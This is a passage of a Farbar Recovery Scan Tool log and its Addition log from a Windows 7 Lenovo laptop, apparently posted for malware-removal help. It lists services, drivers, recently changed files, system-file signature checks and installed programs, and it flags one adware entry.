S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\lenovo\easyplussdk\bin\EPHotspot64.exe [559872 2014-08-06] (Lenovo)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-09-14] (Intel Corporation)
S3 MSSQL$MSSMLBIZ; c:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [24560 2014-06-18] ()
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-06] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2058776 2009-08-03] (Intel Corporation)
R2 Viewpoint Manager Service; C:\Program Files (x86)\Viewpoint\Common\ViewpointService.exe [24652 2008-09-08] (Viewpoint Corporation) [File not signed]
R2 vToolbarUpdater18.1.10; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\ToolbarUpdater.exe [1849368 2014-10-29] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [262424 2014-10-07] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-28] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [124184 2014-10-05] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [274200 2014-10-10] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-10-29] (AVG Technologies)
S3 RFCOMM; C:\Windows\System32\DRIVERS\rfcomm.sys [158720 2009-07-13] (Microsoft Corporation) [File not signed]
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)
S3 whfltr2k; C:\Windows\System32\DRIVERS\whfltr2k.sys [9600 2007-01-26] ()
S2 regi; \??\C:\Windows\system32\drivers\regi.sys [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]
S3 vpnva; system32\DRIVERS\vpnva64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 12:50 - 2014-10-29 12:57 - 00036480 _____ () C:\Users\Charles\Desktop\Addition.txt
2014-10-29 12:27 - 2014-10-29 12:59 - 00025020 _____ () C:\Users\Charles\Desktop\FRST.txt
2014-10-29 12:25 - 2014-10-29 12:57 - 00000000 ____D () C:\FRST
2014-10-29 12:21 - 2014-10-29 12:21 - 02113536 _____ (Farbar) C:\Users\Charles\Desktop\FRST64.exe
2014-10-29 11:53 - 2014-10-29 12:18 - 00002653 _____ () C:\Windows\SysWOW64\debug.log
2014-10-29 11:53 - 2014-10-29 11:53 - 00000000 ____D () C:\Users\Charles\AppData\Local\AVG Web TuneUp
2014-10-29 11:53 - 2014-10-29 11:53 - 00000000 ____D () C:\ProgramData\AVG Security Toolbar
2014-10-29 11:52 - 2014-10-29 11:53 - 00000000 ____D () C:\ProgramData\AVG Web TuneUp
2014-10-29 11:52 - 2014-10-29 11:52 - 00000000 ____D () C:\ProgramData\AVG Secure Search
2014-10-29 11:52 - 2014-10-29 11:52 - 00000000 ____D () C:\Program Files (x86)\AVG Web TuneUp
2014-10-29 11:52 - 2014-10-29 11:51 - 00050976 _____ (AVG Technologies) C:\Windows\system32\Drivers\avgtpx64.sys
2014-10-29 11:47 - 2014-10-29 11:47 - 00002442 _____ () C:\Windows\System32\Tasks\1014avUpdateInfo
2014-10-29 11:44 - 2014-10-29 11:44 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\AVG2015
2014-10-29 11:43 - 2014-10-29 11:43 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\TuneUp Software
2014-10-29 11:43 - 2014-10-29 11:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-10-29 11:41 - 2014-10-29 11:43 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-29 11:37 - 2014-10-29 11:43 - 00000000 ____D () C:\Users\Charles\AppData\Local\Avg2015
2014-10-29 11:37 - 2014-10-29 11:37 - 00000000 ____D () C:\Users\Charles\AppData\Local\MFAData
2014-10-29 11:12 - 2014-10-29 11:12 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-29 11:12 - 2014-10-29 11:12 - 00001113 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-29 11:12 - 2014-10-29 11:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-29 11:12 - 2014-10-29 11:12 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-29 11:12 - 2014-10-29 11:12 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-29 11:12 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-29 11:12 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-29 11:12 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-29 11:10 - 2014-10-29 12:09 - 00001184 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-29 11:10 - 2014-10-29 12:09 - 00001184 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-29 11:10 - 2014-10-29 11:10 - 00000552 _____ () C:\Windows\system32\spsys.log
2014-10-18 12:20 - 2014-10-18 12:20 - 00011046 _____ () C:\Windows\DPINST.LOG
2014-10-18 12:20 - 2014-10-18 12:20 - 00001436 _____ () C:\Windows\Synaptics.log
2014-10-18 12:20 - 2014-10-18 12:20 - 00000000 ____H () C:\Windows\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01009.Wdf
2014-10-18 12:20 - 2014-07-28 12:25 - 00536304 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynCOM.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00461552 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\SynTP.sys
2014-10-18 12:20 - 2014-07-28 12:25 - 00224496 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPAPI.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00173808 _____ (Synaptics Incorporated) C:\Windows\system32\SynTPCo14.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00114416 _____ (Synaptics Incorporated) C:\Windows\SysWOW64\SynTPCOM.dll
2014-10-18 12:20 - 2014-07-28 12:25 - 00045296 _____ (Synaptics Incorporated) C:\Windows\system32\Drivers\Smb_driver_Intel.sys
2014-10-18 12:19 - 2014-10-18 12:19 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2014-10-16 22:06 - 2014-10-16 22:05 - 00272808 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaws.exe
2014-10-16 22:05 - 2014-10-16 22:05 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\javaw.exe
2014-10-16 22:05 - 2014-10-16 22:05 - 00175528 _____ (Oracle Corporation) C:\Windows\SysWOW64\java.exe
2014-10-16 22:05 - 2014-10-16 22:05 - 00098216 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2014-10-16 16:37 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-16 16:37 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-16 16:37 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-16 16:37 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-16 16:37 - 2014-09-20 00:16 - 19280896 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 16:37 - 2014-09-20 00:16 - 15399424 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 16:37 - 2014-09-19 22:57 - 14368768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-16 16:37 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 16:37 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 16:37 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 16:37 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 16:37 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 16:37 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 16:37 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 16:37 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 16:37 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-16 16:37 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 16:37 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 16:36 - 2014-09-20 00:18 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 16:36 - 2014-09-20 00:17 - 02236928 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 16:36 - 2014-09-20 00:17 - 01407488 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 03959296 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 02655232 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00855552 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00197120 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00136704 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00097280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00053760 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 16:36 - 2014-09-20 00:16 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 16:36 - 2014-09-20 00:15 - 01508864 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 16:36 - 2014-09-20 00:15 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 16:36 - 2014-09-20 00:15 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 13757952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 02861568 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 02055168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 01762816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 01180672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00493056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00391168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00109056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesysprep.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00080384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00039936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-16 16:36 - 2014-09-19 22:57 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-16 16:36 - 2014-09-19 22:56 - 01440768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-16 16:36 - 2014-09-19 22:56 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-16 16:36 - 2014-09-19 22:56 - 00226816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-16 16:36 - 2014-09-19 22:38 - 02706432 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 16:36 - 2014-09-19 22:33 - 02706432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-16 16:36 - 2014-09-19 21:43 - 00089600 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-16 16:36 - 2014-09-19 21:35 - 00071680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RegisterIEPKEYs.exe
2014-10-16 16:36 - 2014-09-04 21:11 - 06584320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 16:36 - 2014-09-04 20:52 - 05703168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 16:36 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 16:36 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 16:36 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2014-10-16 16:35 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 16:35 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-10 15:14 - 2014-10-10 15:14 - 00274200 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgtdia.sys
2014-10-07 21:43 - 2014-10-07 21:43 - 00262424 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgidsdrivera.sys
2014-10-05 21:41 - 2014-10-05 21:41 - 00124184 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\Drivers\avgmfx64.sys
2014-10-01 22:58 - 2014-09-24 21:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-01 22:58 - 2014-09-24 20:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-10-01 22:58 - 2014-09-09 17:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-10-01 22:58 - 2014-09-09 16:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-29 12:47 - 2009-12-02 14:05 - 01766829 _____ () C:\Windows\WindowsUpdate.log
2014-10-29 12:18 - 2010-12-07 20:53 - 00000000 ___RD () C:\Users\Charles\Documents\My Dropbox
2014-10-29 12:17 - 2010-12-07 20:51 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\Dropbox
2014-10-29 12:16 - 2012-07-16 16:05 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-29 12:15 - 2011-06-10 19:05 - 00001024 _____ () C:\Users\Charles\.rnd
2014-10-29 12:14 - 2014-09-16 23:30 - 00004452 _____ () C:\Windows\setupact.log
2014-10-29 12:14 - 2012-12-12 23:35 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-29 12:14 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-29 12:13 - 2012-03-18 19:34 - 00137694 _____ () C:\Windows\PFRO.log
2014-10-29 12:06 - 2012-12-12 23:36 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-29 11:53 - 2013-08-04 23:21 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-29 11:46 - 2010-10-25 21:30 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-29 11:40 - 2009-12-04 23:03 - 00000000 ____D () C:\Program Files (x86)\AVG
2014-10-29 11:12 - 2011-01-08 14:34 - 00000000 ____D () C:\Users\Charles\Desktop\MISC
2014-10-29 11:07 - 2010-10-25 22:54 - 00000000 ____D () C:\ProgramData\AVG10
2014-10-29 10:47 - 2010-10-25 22:54 - 00000000 ____D () C:\Windows\system32\Drivers\AVG
2014-10-29 10:46 - 2009-07-14 00:13 - 00006712 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-29 10:23 - 2010-10-06 01:31 - 00000000 ____D () C:\Program Files (x86)\Viewpoint
2014-10-29 10:13 - 2014-08-05 12:04 - 00000000 ____D () C:\THOMPSON v. TRW
2014-10-28 22:40 - 2010-12-17 12:20 - 00007602 _____ () C:\Users\Charles\AppData\Local\Resmon.ResmonCfg
2014-10-28 22:32 - 2011-11-24 17:37 - 00000000 ____D () C:\Program Files (x86)\Diablo II
2014-10-18 12:23 - 2009-12-02 14:00 - 00003020 _____ () C:\Windows\System32\Tasks\PMTask
2014-10-18 12:22 - 2009-07-13 22:20 - 00000000 __RSD () C:\Windows\Media
2014-10-18 12:20 - 2013-05-16 01:35 - 00002982 _____ () C:\Windows\System32\Tasks\Synaptics TouchPad Enhancements
2014-10-18 12:19 - 2014-09-22 22:15 - 00000000 ____D () C:\Windows\System32\Tasks\Lenovo
2014-10-18 12:19 - 2009-12-02 14:16 - 00000000 ____D () C:\Windows\Downloaded Installations
2014-10-18 12:19 - 2009-12-02 13:53 - 00000000 ____D () C:\Program Files (x86)\Lenovo
2014-10-18 08:01 - 2012-12-12 23:36 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-18 08:01 - 2012-12-12 23:36 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 18:10 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\rescache
2014-10-17 16:44 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-16 22:09 - 2014-04-22 23:13 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 22:07 - 2013-10-30 23:26 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-16 22:05 - 2009-12-02 14:10 - 00000000 ____D () C:\Program Files (x86)\Java
2014-10-16 21:27 - 2009-07-13 23:45 - 00464672 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 20:27 - 2009-12-02 14:29 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-16 16:56 - 2013-07-17 22:18 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 16:50 - 2009-12-05 00:10 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-15 17:23 - 2010-01-04 13:31 - 00000000 ____D () C:\Users\Charles\AppData\Roaming\.oit
2014-10-02 15:53 - 2009-12-04 22:12 - 00278152 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe

Some content of TEMP:
====================
C:\Users\Charles\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
C:\Users\Charles\AppData\Local\Temp\jre-7u71-windows-i586-iftw.exe

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-17 18:02

==================== End Of Log ============================

ADDITION LOG

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-10-2014 01
Ran by Charles at 2014-10-29 13:01:33
Running from C:\Users\Charles\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG AntiVirus Free Edition 2015 (Enabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Registry Patch to arrange icons in Device and Printers folder of Windows 7 (HKLM\...\W7DevOR) (Version: 1.00 - )
2007 Microsoft Office system (HKLM-x32\...\PROHYBRIDR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 3.00 - Lenovo)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.12 - Adobe Systems)
Adobe Flash Player 10 Plugin (HKLM-x32\...\{0DFB3DE8-65B9-44FF-AA0A-3BECC5A2BFD1}) (Version: 10.0.32.18 - Adobe Systems, Inc.)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.02) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.02 - Adobe Systems Incorporated)
Advanced Wheel Mouse 6.0.0.001 (HKLM-x32\...\WheelMouse) (Version:  - )
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Audio / Video Codec Pack (HKLM-x32\...\{B21C0FF0-AECF-47F7-9036-A1A32B10A168}) (Version: 2.0.015 - )
AVG 2015 (HKLM\...\AVG) (Version: 2015.0.5557 - AVG Technologies)
AVG 2015 (Version: 15.0.4189 - AVG Technologies) Hidden
AVG 2015 (Version: 15.0.5557 - AVG Technologies) Hidden
AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.0.0.17 - AVG Technologies)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Business Contact Manager for Outlook 2007 SP2 (HKLM-x32\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (x32 Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Client Security - Password Manager (HKLM\...\{3FD730D4-755F-439B-8082-B55E00924A44}) (Version: 8.30.0049.00 - Lenovo Group Limited)
Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.12.0 - Conexant)
Create Recovery Media (HKLM-x32\...\{50DC5136-21E8-48BC-97E5-1AD055F6B0B6}) (Version: 1.20.0.00 - Lenovo Group Limited)
Crossrider Web Apps (HKLM-x32\...\Crossrider) (Version:  - ) <==== ATTENTION
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diablo II (HKLM-x32\...\Diablo II) (Version:  - Blizzard Entertainment)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
DivX Setup (HKLM-x32\...\DivX Setup) (Version: 2.6.1.100 - DivX, LLC)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.30 - Dropbox, Inc.)
E-Transcript Bundle Viewer (HKLM-x32\...\{72AE5ECD-0CAF-4017-BC86-E2908014C09C}) (Version: 5.0.2.132 - Thomson Reuters)
FileZilla Client 3.7.2 (HKLM-x32\...\FileZilla Client) (Version: 3.7.2 - Tim Kosse)
Google Update Helper (x32 Version: 1.3.25.5 - Google Inc.) Hidden
Hanword HWP document converter for Microsoft Word (x64) (HKLM\...\{90150000-2009-0409-1000-0000000FF1CE}) (Version: 15.0.4454.1506 - Microsoft Corporation)
HP Officejet Pro 8500 A910 Basic Device Software (HKLM\...\{33A06AC3-F20D-417A-B621-83A73771624E}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
HP Officejet Pro 8500 A910 Help (HKLM-x32\...\{13D324E9-9DB1-478D-944C-28BBE1BB80DC}) (Version: 140.0.2.2 - Hewlett Packard)
HP Officejet Pro 8500 A910 Product Improvement Study (HKLM\...\{963EF6DD-DE6B-43D8-A2AC-9217FD39958F}) (Version: 22.0.334.0 - Hewlett-Packard Co.)
